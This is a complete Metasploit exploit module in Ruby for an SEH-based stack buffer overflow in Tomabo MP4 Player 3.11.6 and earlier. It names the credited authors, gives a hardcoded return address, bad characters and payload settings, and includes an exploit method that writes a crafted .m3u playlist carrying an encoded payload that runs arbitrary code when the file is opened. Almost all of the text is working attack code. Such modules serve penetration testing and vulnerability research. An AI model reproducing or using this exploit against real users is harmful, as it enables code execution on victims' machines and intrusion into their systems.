## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Tomabo M3U SEH Based Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack over flow in Tomabo MP4 Player <= 3.11.6. When the application is used to open a specially crafted m3u file, an buffer is overwritten allowing for the execution of arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'yokoacc', # Proof of concept 'nudragn', # Proof of concept 'rungga_reksya', # Proof of concept 'rahmat_nurfauzi' # Metasploit module ], 'References' => [ [ 'EDB', '38486' ], [ 'URL', 'http://www.tomabo.com/mp4-player/download.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', 'StackAdjustment' => -3500, 'DisableNops' => 'True', }, 'Payload' => { 'Space' => 1800, 'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x1a\x20" }, 'Platform' => 'win', 'Targets' => [ [ 'Tomabo MP4 Player <= 3.11.6', { 'Ret' => 0x00401CA9 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Oct 18 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), ], self.class) end def exploit sploit = rand_text_alpha_upper(1028) sploit << "\xeb\x08\x90\x90" # short jump 8 bytes sploit << [target.ret].pack('V') # universal sploit << "\x90" * 16 sploit << payload.encoded sploit << "\x44" * 436 playlist = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(playlist) end end